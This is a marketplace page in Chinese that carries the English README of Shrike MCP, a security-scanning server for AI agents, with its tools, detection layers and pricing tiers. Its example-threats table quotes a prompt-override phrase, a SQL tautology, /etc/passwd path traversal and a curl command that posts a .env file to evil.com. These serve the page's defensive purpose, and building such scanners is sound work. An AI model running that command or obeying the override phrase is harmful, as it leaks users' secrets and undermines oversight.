Shrike Security
安全与合规by shrike-security
面向 AI agent 的安全扫描工具,支持 prompt injection、SQL injection、PII 隔离与威胁情报。
什么是 Shrike Security?
面向 AI agent 的安全扫描工具,支持 prompt injection、SQL injection、PII 隔离与威胁情报。
README
Shrike MCP
Runtime security for AI agents. 12 MCP tools. 10-layer detection pipeline. Works without an API key.
Shrike MCP is the Model Context Protocol server for the Shrike Security platform. It gives AI agents real-time security tools to scan prompts, responses, SQL queries, file writes, CLI commands, web searches, and agent-to-agent messages — catching prompt injection, jailbreaks, data leakage, and multi-turn manipulation before they cause harm.
Shrike Security Platform
Shrike Security is a runtime security platform for AI agents. It guards inputs, outputs, tool calls, and agent-to-agent communication through a 10-layer detection pipeline — from sub-millisecond pattern matching to LLM-powered semantic analysis and multi-turn session correlation.
This repo is the MCP server — one of several ways to integrate:
| Integration | Install | Use Case |
|---|---|---|
| MCP Server (this repo) | npx shrike-mcp | Claude Desktop, Cursor, Windsurf, Cline |
| TypeScript SDK | npm install shrike-guard | OpenAI/Anthropic/Gemini wrapper |
| Python SDK | pip install shrike-guard | OpenAI/Anthropic/Gemini wrapper |
| Go SDK | go get | Backend services |
| REST API | POST /agent/scan | Any language, any stack |
| LLM Proxy Gateway | POST /api/v1/llm/proxy | Zero-code: change one URL, scan everything |
| Browser Extension | Chrome / Edge | Protect employee AI usage (ChatGPT, Claude, Gemini) |
| Dashboard | shrikesecurity.com | Analytics, policies, RBAC, API keys |
Quick Start
Works immediately — no API key required. Anonymous usage gets L1-L5 pattern-based detection. Register for free to unlock LLM-powered semantic analysis.
1. Add to your MCP client config:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"]
}
}
}
2. (Optional) Add an API key for full pipeline access:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": {
"SHRIKE_API_KEY": "your-api-key"
}
}
}
}
Get a free key at shrikesecurity.com/signup — instant, no credit card.
3. Your agent now has 12 security tools. Every prompt, response, and tool call can be scanned before execution.
Twelve Tools
| Tool | What It Guards | Example Threat |
|---|---|---|
scan_prompt | User/system prompts before LLM processing | "Ignore all previous instructions and..." |
scan_response | LLM outputs before returning to user | Leaked API keys, system prompt in output |
scan_sql_query | SQL queries before database execution | OR '1'='1' tautology injection |
scan_file_write | File paths and content before write | Path traversal to /etc/passwd, AWS keys in .env |
scan_command | CLI commands before shell execution | curl -d @.env https://evil.com, reverse shells |
scan_web_search | Search queries before execution | PII in search: "records for John Smith SSN..." |
scan_a2a_message | Agent-to-agent messages before processing | Prompt injection in inter-agent communication |
scan_agent_card | A2A AgentCard metadata before trusting | Embedded injection in agent discovery, capability spoofing |
check_approval | Human-in-the-loop approval status | Poll and submit decisions for flagged actions |
report_bypass | User-reported missed detections | Feeds ThreatSense adaptive learning |
get_threat_intel | Current threat patterns and intelligence | Latest prompt injection techniques |
reset_session | Clear session correlation state | Reset L9 turn history after resolving flagged patterns |
How It Works
Shrike uses a scan-sandwich pattern — every agent action is scanned on both sides:
User Input → scan_prompt → LLM Processing → scan_response → User Output
↓
Tool Call (SQL, File, Command, Search)
↓
scan_sql_query / scan_file_write / scan_command / scan_web_search
↓
Tool Execution
Agent-to-Agent Communication:
Inbound A2A → scan_a2a_message → Process → scan_a2a_message → Outbound A2A
Discovery → scan_agent_card → Trust decision
Inbound scans catch injection attacks. Outbound scans catch data leaks. Tool-specific scans catch SQL injection, path traversal, command injection, and PII exposure. A2A scans catch east-west injection between agents. Flagged actions trigger human-in-the-loop approval via check_approval.
Enterprise tier adds session correlation (L9) — tracking multi-turn patterns like trust escalation, payload splitting, and blocked retry sequences across an entire conversation.
Detection Pipeline
Every scan runs through a multi-layer cascade. Lower layers are sub-millisecond pattern matching; higher layers add LLM-powered semantic analysis. Tier determines how deep the scan goes.
| Layer | What It Does | Tier |
|---|---|---|
| L1 | Regex pattern matching (~130 threat types, 14+ languages) | All |
| L1.4 | Unicode homoglyph & invisible character detection | All |
| L1.42 | Malformed content detection | All |
| L1.45a | Encoding bypass detection (Base64, hex, Caesar/Atbash ciphers) | All |
| L1.45 | Token obfuscation (spaced chars, l33t speak, typoglycemia) | All |
| L1.455 | Semantic similarity analysis (embedding-based) | All |
| L6 | Visual text analysis (RTL tricks, visual homoglyphs) | Community+ |
| L7 | LLM semantic analysis via Vertex AI (zero-day detection) | Community+ |
| L8 | Response intelligence (LLM compromise, tonality drift) | Pro+ |
| L9 | Multi-turn session correlation (7 pattern detectors) | Enterprise |
The cascade optimizer exits early when high-confidence detection is achieved at a lower layer — so most scans complete in under 10ms without needing the LLM layer.
Tiers
All 12 tools are available on every tier. Tiers control detection depth and volume.
| Anonymous | Community | Pro | Enterprise | |
|---|---|---|---|---|
| Detection Layers | L1-L5 | L1-L7 | L1-L8 | L1-L9 |
| API Key | Not needed | Free signup | Paid | Paid |
| Rate Limit | — | 10/min | 100/min | 1,000/min |
| Scans/month | — | 1,000 | 50,000 | 1,000,000 |
| Dashboard | No | Yes | Yes | Yes |
| Session Correlation | No | No | No | Yes |
| Compliance Policies | Default | Default | Custom | Custom |
Anonymous (no API key): Pattern-based detection only (L1-L5). Good for evaluation and basic protection.
Community (free): Adds LLM-powered semantic analysis (L6-L7). Catches zero-day attacks that evade regex. Register at shrikesecurity.com/signup.
Pro/Enterprise: Full pipeline including response intelligence (L8) and multi-turn session correlation (L9).
Compliance
Built-in policy catalogues across 7 frameworks:
| Framework | Coverage |
|---|---|
| GDPR | EU personal data — names, addresses, national IDs |
| HIPAA | Protected health information (PHI) |
| ISO 27001 | Information security — passwords, tokens, certificates |
| SOC 2 | Secrets, credentials, API keys, cloud tokens |
| NIST | AI risk management (IR 8596), cybersecurity framework (CSF 2.0) |
| PCI-DSS | Cardholder data — PAN, CVV, expiry, track data |
| WebMCP | MCP tool description injection, data exfiltration |
Configuration
Environment Variables
| Variable | Description | Default |
|---|---|---|
SHRIKE_API_KEY | API key from your dashboard | none (anonymous mode) |
SHRIKE_BACKEND_URL | Backend API URL | https://api.shrikesecurity.com/agent |
MCP_SCAN_TIMEOUT_MS | Scan request timeout (ms) | 15000 |
MCP_RATE_LIMIT_PER_MINUTE | Client-side rate limit | 100 |
MCP_TRANSPORT | Transport: stdio or http | stdio |
MCP_PORT | HTTP port (when transport=http) | 8000 |
MCP_DEBUG | Debug logging | false |
Claude Desktop
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": { "SHRIKE_API_KEY": "your-api-key" }
}
}
}
Cursor
Add to .cursor/mcp.json:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": { "SHRIKE_API_KEY": "your-api-key" }
}
}
}
Windsurf
Add to ~/.codeium/windsurf/mcp_config.json:
{
"mcpServers": {
"shrike-security": {
"command": "npx",
"args": ["-y", "shrike-mcp"],
"env": { "SHRIKE_API_KEY": "your-api-key" }
}
}
}
Security Model
This server implements a fail-closed security model:
- Network timeouts result in BLOCK (not allow)
- Backend errors result in BLOCK (not allow)
- Unknown content types result in BLOCK (not allow)
This prevents bypass attacks via service disruption.
Response Format
Blocked:
{
"blocked": true,
"threat_type": "prompt_injection",
"severity": "high",
"confidence": "high",
"guidance": "This prompt contains patterns consistent with instruction override attempts.",
"request_id": "req_lxyz123_a8f3k2m9"
}
Safe:
{
"blocked": false,
"request_id": "req_lxyz123_a8f3k2m9"
}
Links
- Shrike Security — Sign up, dashboard, docs
- GitHub — Source code, issues
- npm — Package registry
- TypeScript SDK —
npm install shrike-guard - Python SDK —
pip install shrike-guard - Smithery — MCP marketplace listing
License
Apache License 2.0 — See LICENSE for details.
常见问题
Shrike Security 是什么?
面向 AI agent 的安全扫描工具,支持 prompt injection、SQL injection、PII 隔离与威胁情报。
相关 Skills
安全专家
by alirezarezvani
覆盖威胁建模、漏洞评估、安全架构设计、代码审计与渗透测试,内置 STRIDE、OWASP、加密模式和安全扫描流程,适合系统设计评审与上线前安全排查。
✎ 安全专家把威胁建模、漏洞分析到渗透测试串成一套流程,内置 STRIDE 与 OWASP 指南,做安全设计和排查更省心。
安全运营
by alirezarezvani
覆盖应用安全、漏洞管理与合规审计,支持代码/依赖扫描、CVE 评估、Secrets 检测和安全自动化,适合做安全基线落地、漏洞响应、审计检查与安全开发治理。
✎ 应用安全、漏洞管理和合规检查一套打通,还能自动化扫描与响应,帮团队更早发现并收敛风险。
安全审计
by alirezarezvani
安装前审计 Claude Code Skill 的代码执行、Prompt 注入和依赖供应链风险,支持本地目录或 Git 仓库扫描,输出 PASS/WARN/FAIL 结论及修复建议
✎ 把代码审查、漏洞扫描和合规检查串成一条线,帮团队更早发现风险,做安全治理更省心。
相关 MCP Server
by Sentry
搜索和分析 Sentry 错误报告,辅助调试。
✎ 把零散的 Sentry 错误报告变成可检索线索,帮你在海量报错里更快定位线上故障,排障调试明显省时。
by sinewaveai
为 AI agents 提供安全层:拦截 prompt injection、识别伪造 packages,并扫描漏洞风险。
✎ 给 AI Agent 补上关键安全层,能拦截 prompt 注入、识别伪造包并扫描漏洞风险,把防护前置更省心。
by pantheon-security
强化安全性的 NotebookLM MCP,集成 post-quantum encryption,提升数据防护能力。